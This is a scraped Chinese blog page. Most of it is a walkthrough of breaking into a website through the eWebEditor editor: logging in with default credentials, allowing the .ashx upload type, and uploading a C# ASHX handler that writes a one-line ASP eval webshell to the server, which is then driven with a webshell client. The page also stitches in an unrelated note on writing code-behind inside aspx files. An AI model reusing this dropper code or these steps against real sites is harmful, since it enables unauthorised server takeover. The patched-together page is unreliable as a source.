2. 程式人生 > >aspx寫cs後臺程式碼(突破上傳過濾一招,利用ashx)

aspx寫cs後臺程式碼(突破上傳過濾一招,利用ashx)

阿新 發佈:2019-01-16

http://www.2cto.com/Article/201302/188962.html

前言:有人已經寫過了,突破上傳過濾,今天我也碰到了。就當記錄一下吧,

正文:有個朋友要我給他檢測一個站點,很久都沒操作,用來練練手把。 用自動掃描指令碼掃描出敏感目錄 inc/ewebeditor/admin_login.asp 既然有ewebeditor編輯器那就嘗試下編輯器漏洞把。 /inc/ewebeditor/admin/upload.asp?id=6&d_viewmode=list&dir=../ 直接遍歷來了。 使用預設密碼登入ewebeditor後臺,新新增樣式,本想很容易解決。 上傳免殺小馬
加密一句話也是一樣的結果。 那我們怎麼解決之個問題呢- 首先在編輯器樣式的上傳檔案新增ashx字尾 在上傳我們的Ashx馬。 <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {     public void ProcessRequest (HttpContext context) {         context.Response.ContentType = "text/plain";         StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));         file1.Write("<%eval request(\"a\")%>");         file1.Flush();         file1.Close();     }     public bool IsReusable {         get {             return false;         }     } } 接下來訪問http://www.xxx.com/UploadFile/eWebEditor/201329112155838.ashx 會在eWebEditor生成一個m.asp檔案(一句話木馬) 用菜刀訪問http://www.2cto.com /UploadFile/eWebEditor/m.asp 就突破了
我們新建的ashx一般都帶.cs檔案,這裡把cs檔案的後臺程式碼寫在了ashx檔案裡面然後把cs檔案刪了,然後把ashx檔案頭部的CodeBehind="Handler.cs"這句去掉. (vs中選中ashx檔案右鍵開啟方式:xml編輯器開啟) http://cache.baiducontent.com/c?m=9f65cb4a8c8507ed4fece763104687270e54f7327d818c027fa3cf1fd5791d1c053db2fa3a211306d0cf786600ad5d19b7b0607d207326a0efbb9f3bddace55838895723061e913114c418dfdc3023d656e34de8df4aa6f8ba2592dec5a2dd4324be&p=8d33c64ad49e57ff57e9c02945&newp=8b2a971bcc9e15e808e290625553d8274e39806238d68e0f2280d4&user=baidu&fm=sc&query=%B4%FA%C2%EB%D0%B4%D4%DAaspx%C0%EF&qid=b3ba798900012663&p1=10 在aspx也寫cs後臺代
碼:在HTML頁面寫C#程式碼其實和與在後臺一樣,只要把設計器生成的程式碼也加入進去就行。(繼承:<script language="C#" runat="server"></script>這樣的程式碼如何繼承吧? 頁面頂部 <%@ page language="c#" inherits="名稱空間, 類名" %>) http://www.cnblogs.com/cuihongyu3503319/archive/2012/06/23/2559552.html
<script language="c#" runat="server"> #region Page_Load private void Page_Load(object sender, System.EventArgs e) { if (!Page.IsPostBack) { } } #endregion #region Web Form Designer generated code override protected void OnInit(EventArgs e) { // // CODEGEN:該呼叫是 ASP.NET Web 窗體設計器所必需的。 // InitializeComponent(); base.OnInit(e); } /// <summary> /// 設計器支援所需的方法 - 不要使用程式碼編輯器修改 /// 此方法的內容。 /// </summary> private void InitializeComponent() { this.Load += new System.EventHandler(this.Page_Load); } #endregion


相關推薦

aspxcs後臺程式碼(突破過濾,利用ashx)

http://www.2cto.com/Article/201302/188962.html 前言:有人已經寫過了,突破上傳過濾,今天我也碰到了。就當記錄一下吧, 正文:有個朋友要我給他檢測一個站點,很久都沒操作,用來練練手把。 用自動掃描指令碼掃描出敏感目錄 in

不帶插件 ,自己js,實現批量文件及進度顯示

批量上傳 發的 xhr string () .cn tom 需要 pen 今天接受項目中要完成文件批量上傳文件而且還要顯示上傳進度,一開始覺得這個應該不是很麻煩,當我在做的時候遇到了很多問題,很頭疼啊。 不過看了別人寫的代碼,自己也測試過,發現網上好多都存在一些問題,並不是

愛鏈筆記-後臺文件

span lang 是把 命令 penssh Opens 開始 使用 安裝 這次我來談談後臺的使用,首先就是把本地文件上傳到後端上。為了達成https,需要將證書放到後端上。具體怎麽申請後面會說哈。開始我在網上查,看到有個軟件專門完成這個目的,叫winscp,不過我使用了s

Tomcat後臺弱口令war包漏洞復現

近期在專案中碰到的ApacheTomcat中介軟體愈來愈多,於是乎。想著做一個整理。將ApacheTomcat中介軟體的幾大較為重要的高危漏洞做一個總結整理復現。用作來鞏固更新自己的知識庫。 首先我們先來了解以下Tomcat的概念: Tomcat是我們在工作中所使用的一款開源輕量級的Web應

Git------的使用管理程式碼gitHub

  這次課程的視訊連結(B站) 傳送門:https://www.bilibili.com/video/av17183591/?p=1 共五集 核心程式碼 下載程式碼 git clone [email protected]:lenvo222/L

IDEA使用總結1-Github下載程式碼程式碼到Git

      1、 首先你需要在IDEA中建立一個專案,建立完專案後使能版本管理外掛 選擇git後建立本地git倉庫成功,提示如下   2、第二步 commit程式碼到 commit時會提示是否需要進行檢查什麼的  

小蜂窩徹底解決ewebeditor網站後臺不能圖片的方法

經我們技術員檢查,結果原來是eWebEditor文字編輯器對IE8瀏覽器的相容性導致的指令碼錯誤,並不是什麼“網站空間、伺服器中毒、出問題了”呢! 現就將解決方法公佈給大家,方便大家修正自己網站的程式碼以使文字編輯器在各種瀏覽器下都能相容、正常使用! 解決IE8

爬取微信好友資訊,進行視覺化分析(頭像人臉識別部分已更新!)(程式碼

【Code】下載 1、專案說明 本次專案主要實現了以下功能: 2、微信好友資訊的獲取與檔案儲存 3、微信好友性別分析 4、微信好友地區分佈視覺化 5、微信好友個性簽名詞雲圖及好友備註詞雲圖 6、微信好

GitHub程式碼以及刪除

向GitHub提交程式碼 1.首先在終端cd到自己的code目錄,比如程式碼在Sort檔案中,就cd到Sort資料夾 2.cd到這個目錄以後,終端輸入 git init 3.繼續。(“ . “表示將Sort資料夾中的所有檔案新增,新增具體的檔案時在git add 後邊加

java Ueditor 百度編輯器 整合ssm後臺多圖片,無縫加入專案做新增儲存

效果圖  多圖片單圖片 上傳到後臺 本地儲存。編輯框回顯,複製貼上直接用,適合實際專案中做 內容發表,發表文章等等編輯自定義上傳圖片 多圖片到後臺路徑,看了網上一推教程,走了很多彎路,簡單明瞭 ,複製貼上直接用 專案地址 https://download.csdn.net/d

阿里雲oss springMVC+ajax後臺和前端檔案

oss上傳檔案 後臺上傳 前端ajax程式碼,傳入一個input物件 function uploadFileOss(input, callback) { var form = $("<form></form>"); form.append($(

git修改程式碼

1、Fork 源專案(查詢到需要的程式碼,fork到自己的庫中) 如:https://github.com/zhangsean/oracle-11g 訪問這個地址,登陸自己的賬號,fork到自己的庫中

使用word優雅的新增程式碼到部落格園

使用Ctrl+c/v從word到部落格園,發現會很亂,後來發現word竟然可以上傳到部落格,恩6的一批,but!!!!為毛上傳之後格式被狗吃了?!!!!     現在教大家優雅的插入程式碼,和上傳的部落格園,恩,其實網上資料還是蠻多的,兩個結合到一塊的.好像沒看到啊   &n

wordpress主題後臺製作 圖片功能 呼叫媒體中心

前面我們通過幾篇文章講述了怎樣新增一個簡單的表單,雖然只演示了簡單的文字輸入框,但是像文字域、單選框之類的跟文字輸入框基本一樣,今天這篇教程講述怎樣給wordpress後臺設定頁面新增一個圖片上傳功能,對於自定義背景、自定義頭部我們可以使用wp提供的函式,請參考本站wordp

Java 後臺模擬POST

package org.lives.platform.upload.utils; import java.io.BufferedReader; import java.io.DataInputStream; import java.io.DataOutputStream; import java.io.Fi

不帶外掛 ,自己js,實現批量檔案及進度顯示

今天接受專案中要完成檔案批量上傳檔案而且還要顯示上傳進度,一開始覺得這個應該不是很麻煩,當我在做的時候遇到了很多問題,很頭疼啊。 不過看了別人寫的程式碼,自己也測試過,發現網上好多都存在一些問題,並不是自己想要的。然後自己查閱各種資料,經過自己總結,最終完成了這個功能。

java後臺接受app圖片

package com.sujinabo.file; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream;

畢業設計_後臺_圖片

環境配置 使用kindeditor元件實現 1.新增依賴 加入commons-fileupload 2.在SpirngMVC配置檔案中編寫CommonsMultipartResolver 上傳元件js的實現 kindeditor元件初始化

如何使用Git客戶端進行檔案(程式碼

repository:知識庫 我們先在自己github中點選New repository 在新跳轉的頁面輸入簡單的資訊,然後點選created repository,這樣,我們就把自己的知識庫建立好了。 建立好以後,我們會跳到下面這個頁面:提示你這個知識庫是空的,建

種辦法突破型別限制

發現後臺可以設定上傳型別,但是asp,asa,cer等等都不行,上傳之後就提示下載 嘗試著關閉了下了,還是不行,後來找到了一位前輩寫的文章 過濾了asa,cer,cdx,php,aspx等指令碼型別的上傳情況下新增一個ashx的上傳型別,上傳一個ashx指令碼上去, 指令碼